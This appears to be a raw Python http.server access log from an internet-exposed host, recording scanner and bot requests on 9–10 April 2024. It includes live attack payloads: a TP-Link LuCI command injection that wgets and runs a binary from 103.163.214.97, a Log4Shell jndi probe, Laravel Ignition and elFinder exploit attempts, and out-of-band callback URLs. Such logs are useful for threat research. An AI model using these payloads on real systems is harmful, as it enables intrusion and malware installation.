AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://oast.pro/ HTTP/1.1" 200 - 205.210.31.169 - - [09/Apr/2024 08:56:22] code 400, message Bad request version ('À\\x13À') 205.210.31.169 - - [09/Apr/2024 08:56:22] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03\x98_81Zd\x8bÏ/\x89"']Nâj\x01ñ\x9c !ÓD%µ·,´\x097dä :á&\x9e\x11«T¾w\x87\x06TîÀ\x8b·@îJ\x0fM*^¢\x99\\E/Oë·.\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 205.210.31.169 - - [09/Apr/2024 08:56:23] code 400, message Bad request version ('À(À$À\\x14À') 205.210.31.169 - - [09/Apr/2024 08:56:23] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03È4~S\x07E\x16üÆ\x1c\x1a\x86¼&®\x0eyh¬æó\x97ÏQ4§¯ ¢±1\x1b\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 185.224.128.43 - - [09/Apr/2024 09:03:51] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [09/Apr/2024 09:22:31] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 09:26:33] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 09:26:33] "GET /cgi-bin/slogin/login.py HTTP/1.1" 404 - 45.142.182.76 - - [09/Apr/2024 09:34:32] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [09/Apr/2024 09:49:45] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 09:49:45] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [09/Apr/2024 09:50:52] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 09:50:52] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.60', 44036) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.60 - - [09/Apr/2024 09:52:12] "GET / HTTP/1.1" 200 - 167.94.145.60 - - [09/Apr/2024 09:52:16] "GET / HTTP/1.1" 200 - 167.94.145.60 - - [09/Apr/2024 09:52:16] code 505, message Invalid HTTP version (2.0) 167.94.145.60 - - [09/Apr/2024 09:52:16] "PRI * HTTP/2.0" 505 - 167.94.145.60 - - [09/Apr/2024 09:52:17] code 404, message File not found 167.94.145.60 - - [09/Apr/2024 09:52:17] "GET /favicon.ico HTTP/1.1" 404 - 184.105.247.196 - - [09/Apr/2024 10:41:27] code 400, message Bad request version ('À\\x14À') 184.105.247.196 - - [09/Apr/2024 10:41:27] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03ºß9|óz\x9c\x1d<·\x88<\x13l\x81-\x9bÃFÉÝ\\ǹ+°f^Ó\x07wy\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 146.19.24.28 - - [09/Apr/2024 10:50:12] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [09/Apr/2024 11:05:25] "GET / HTTP/1.1" 200 - 81.200.119.228 - - [09/Apr/2024 11:15:03] code 404, message File not found 81.200.119.228 - - [09/Apr/2024 11:15:03] "HEAD /axis-cgi/mjpg/video.cgi HTTP/1.1" 404 - 81.200.119.228 - - [09/Apr/2024 11:15:06] code 404, message File not found 81.200.119.228 - - [09/Apr/2024 11:15:06] "HEAD /mjpg/1/video.mjpg HTTP/1.1" 404 - 81.200.119.228 - - [09/Apr/2024 11:15:08] code 404, message File not found 81.200.119.228 - - [09/Apr/2024 11:15:08] "HEAD /img/video.mjpeg HTTP/1.1" 404 - 198.235.24.228 - - [09/Apr/2024 11:18:43] "GET / HTTP/1.0" 200 - 128.199.238.89 - - [09/Apr/2024 12:29:08] code 400, message Bad request version ('À\\x14À') 128.199.238.89 - - [09/Apr/2024 12:29:08] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Þ\x7fç\x0en¶M\x0bÙ\x14¾|ö\x1d¬¯K\x09\x8b\x1aq#¬¦\x9bªz[¦@ùô\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 128.199.238.89 - - [09/Apr/2024 12:29:09] code 400, message Bad request version ('À\\x14À') 128.199.238.89 - - [09/Apr/2024 12:29:09] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03é1PÆÛ\x18I\x1c­ÐQ\x12Ú\x89rXS¬Sâ\x15Ï\x12)é\x80\x85Ç\x88\x83ü\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 128.199.238.89 - - [09/Apr/2024 12:29:09] "GET / HTTP/1.1" 200 - 128.199.238.89 - - [09/Apr/2024 12:29:10] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:10] "GET /form.html HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:10] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:10] "GET /upl.php HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:10] code 400, message Bad request version ('À\\x14À') 128.199.238.89 - - [09/Apr/2024 12:29:10] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03µ´æì1Ð*\x8böZf\x8cû\x81ì\x9fó\x9eKç\x02ç÷Ã\x99\x13\x1eé¿Æ[ñ\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 128.199.238.89 - - [09/Apr/2024 12:29:11] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:11] "GET /geoip/ HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:11] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:11] "GET /favicon.ico HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:12] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:12] "GET /1.php HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:12] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:12] "GET /bundle.js HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:13] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:13] "GET /files/ HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:13] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:13] "GET /systembc/password.php HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:13] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:13] "GET /password.php HTTP/1.1" 404 - 128.199.238.89 - - [09/Apr/2024 12:29:14] code 404, message File not found 128.199.238.89 - - [09/Apr/2024 12:29:14] "GET /info.php HTTP/1.1" 404 - 185.224.128.34 - - [09/Apr/2024 12:40:30] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 12:40:30] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 172.105.128.13 - - [09/Apr/2024 12:51:52] code 400, message Bad request version ('À\\x14À') 172.105.128.13 - - [09/Apr/2024 12:51:52] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03ìÈJw×ãsá\x0c(d²Òõ\x1f09¤t/ï³h\x07ë²n\x810UÚ\x03\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 185.117.225.153 - - [09/Apr/2024 13:19:39] code 404, message File not found 185.117.225.153 - - [09/Apr/2024 13:19:39] "GET /robots.txt HTTP/1.1" 404 - 185.117.225.153 - - [09/Apr/2024 13:19:41] "GET / HTTP/1.1" 200 - 45.142.182.118 - - [09/Apr/2024 13:42:20] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [09/Apr/2024 13:52:39] "GET / HTTP/1.1" 200 - 64.62.197.63 - - [09/Apr/2024 13:57:33] "GET / HTTP/1.1" 200 - 64.62.197.72 - - [09/Apr/2024 13:59:37] code 404, message File not found 64.62.197.72 - - [09/Apr/2024 13:59:37] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.76 - - [09/Apr/2024 14:00:08] code 404, message File not found 64.62.197.76 - - [09/Apr/2024 14:00:08] "GET /geoserver/web/ HTTP/1.1" 404 - 185.196.9.61 - - [09/Apr/2024 14:02:00] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 14:02:00] "GET /wan.htm HTTP/1.1" 404 - 185.224.128.43 - - [09/Apr/2024 14:09:38] "GET / HTTP/1.1" 200 - 194.165.16.73 - - [09/Apr/2024 14:27:13] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.165.16.73 - - [09/Apr/2024 14:27:13] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 188.166.152.4 - - [09/Apr/2024 15:20:21] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x01þ\\x01\\x00\\x01ú\\x03\\x03\\x94\\x86¢9!Ø') 188.166.152.4 - - [09/Apr/2024 15:20:21] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03\x94\x86¢9!Ø\x85^hVêeïþí\x17UËìv¼R}*\\ü>}L÷|Ì\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 87.121.69.52 - - [09/Apr/2024 15:23:59] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [09/Apr/2024 15:23:59] "CONNECT google.com:443 HTTP/1.1" 501 - 185.150.26.240 - - [09/Apr/2024 15:49:23] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [09/Apr/2024 16:02:19] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 16:02:19] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [09/Apr/2024 16:07:30] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 16:07:30] "POST /cgi?2 HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 16:07:33] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 16:07:33] "POST /cgi?7 HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 16:40:56] "GET / HTTP/1.1" 200 - 185.150.26.246 - - [09/Apr/2024 16:57:05] "GET / HTTP/1.1" 200 - 117.251.188.135 - - [09/Apr/2024 17:08:55] "GET / HTTP/1.1" 200 - 59.52.101.97 - - [09/Apr/2024 17:52:00] "GET / HTTP/1.1" 200 - 111.224.7.195 - - [09/Apr/2024 17:53:11] "GET / HTTP/1.1" 200 - 182.54.4.64 - - [09/Apr/2024 17:53:14] code 404, message File not found 182.54.4.64 - - [09/Apr/2024 17:53:14] "GET /favicon.ico HTTP/1.1" 404 - 185.196.9.61 - - [09/Apr/2024 18:09:24] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 18:09:24] "GET /RestAPI/ImportTechnicians HTTP/1.1" 404 - 146.19.24.28 - - [09/Apr/2024 18:26:45] "GET / HTTP/1.1" 200 - 162.216.150.19 - - [09/Apr/2024 18:38:47] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [09/Apr/2024 18:57:30] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 18:57:30] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 146.148.113.189 - - [09/Apr/2024 18:58:08] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [09/Apr/2024 19:02:47] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [09/Apr/2024 19:05:07] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 19:37:26] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 19:37:26] "GET /goforms/menu HTTP/1.1" 404 - 80.94.92.60 - - [09/Apr/2024 19:46:08] "GET / HTTP/1.1" 200 - 185.150.26.240 - - [09/Apr/2024 19:55:13] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [09/Apr/2024 20:02:50] "GET / HTTP/1.1" 200 - 167.99.209.184 - - [09/Apr/2024 20:07:50] "GET / HTTP/1.1" 200 - 45.125.66.34 - - [09/Apr/2024 20:38:45] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [09/Apr/2024 20:38:45] "CONNECT google.com:443 HTTP/1.1" 501 - 185.150.26.199 - - [09/Apr/2024 20:44:40] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 21:00:34] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 21:00:34] "POST /Side.php HTTP/1.1" 501 - 185.170.144.3 - - [09/Apr/2024 21:15:11] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.170.144.3 - - [09/Apr/2024 21:15:11] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 87.121.69.52 - - [09/Apr/2024 21:32:53] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [09/Apr/2024 21:32:53] "CONNECT google.com:443 HTTP/1.1" 501 - 157.230.118.40 - - [09/Apr/2024 21:39:28] code 400, message Bad request version ('À\\x14À') 157.230.118.40 - - [09/Apr/2024 21:39:28] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03ö\x00\x0c¹\x0b\x9böÃVº¶BQ¥\x14_z·\x13\x18?×g\x1e\x94½Ó\x83wà\x11«\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 157.230.118.40 - - [09/Apr/2024 21:39:29] code 400, message Bad request version ('À\\x14À') 157.230.118.40 - - [09/Apr/2024 21:39:29] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03¶¾OCë\x972;õ\x04]û³\x1c¯p1Î߶\x15]\x93\x9a\x12ñW\x00Ù¶t\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 157.230.118.40 - - [09/Apr/2024 21:39:29] "GET / HTTP/1.1" 200 - 157.230.118.40 - - [09/Apr/2024 21:39:30] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:30] "GET /form.html HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:30] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:30] "GET /upl.php HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:31] code 400, message Bad request version ('À\\x14À') 157.230.118.40 - - [09/Apr/2024 21:39:31] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03j¼O<Ý\x82\x1aû¥\x92ºYJ#-Ç\x039\x16\x84ceoytµ\x15\x1c:ÊÒý\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 157.230.118.40 - - [09/Apr/2024 21:39:32] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:32] "GET /geoip/ HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:32] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:32] "GET /favicon.ico HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:33] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:33] "GET /1.php HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:33] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:33] "GET /bundle.js HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:34] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:34] "GET /files/ HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:35] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:35] "GET /systembc/password.php HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:35] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:35] "GET /password.php HTTP/1.1" 404 - 157.230.118.40 - - [09/Apr/2024 21:39:36] code 404, message File not found 157.230.118.40 - - [09/Apr/2024 21:39:36] "GET /info.php HTTP/1.1" 404 - 93.88.41.208 - - [09/Apr/2024 21:42:54] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 22:00:49] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 22:00:49] "POST /_ignition/execute-solution HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 22:00:52] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 22:00:52] "POST /_ignition/execute-solution HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 22:00:54] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 22:00:54] "POST /_ignition/execute-solution HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 22:00:56] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 22:00:56] "POST /_ignition/execute-solution HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 22:00:58] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 22:00:58] "POST /_ignition/execute-solution HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 22:01:00] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 22:01:00] "POST /_ignition/execute-solution HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 22:13:45] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 22:13:48] "GET / HTTP/1.1" 200 - 167.71.229.198 - - [09/Apr/2024 22:23:58] code 404, message File not found 167.71.229.198 - - [09/Apr/2024 22:23:58] "GET /aaa9 HTTP/1.1" 404 - 167.71.229.198 - - [09/Apr/2024 22:24:00] code 404, message File not found 167.71.229.198 - - [09/Apr/2024 22:24:00] "GET /aab8 HTTP/1.1" 404 - 167.71.229.198 - - [09/Apr/2024 22:24:01] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 22:31:39] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 22:31:39] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 - 194.120.230.94 - - [09/Apr/2024 22:31:54] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [09/Apr/2024 23:05:17] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 23:15:26] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 23:15:26] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2dvNUVj98QUk0BlQEeiXTJVBMpC.php:aaa HTTP/1.1" 404 - 118.26.39.179 - - [10/Apr/2024 00:02:35] "GET / HTTP/1.1" 200 - 66.240.236.116 - - [10/Apr/2024 00:03:03] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 00:06:11] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 00:06:11] "GET /client/index.php HTTP/1.1" 404 - 83.97.73.245 - - [10/Apr/2024 00:18:25] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 141.98.7.91 - - [10/Apr/2024 00:20:58] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [10/Apr/2024 00:24:40] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 00:24:40] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.224.128.43 - - [10/Apr/2024 00:28:51] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 00:35:46] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 00:35:46] "GET /lab.html?vpath=//interact.sh HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 00:58:21] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 200 - 107.170.239.4 - - [10/Apr/2024 01:00:07] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [10/Apr/2024 01:07:31] code 404, message File not found 83.97.73.245 - - [10/Apr/2024 01:07:31] "GET /actuator/gateway/routes HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('162.142.125.224', 36318) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File 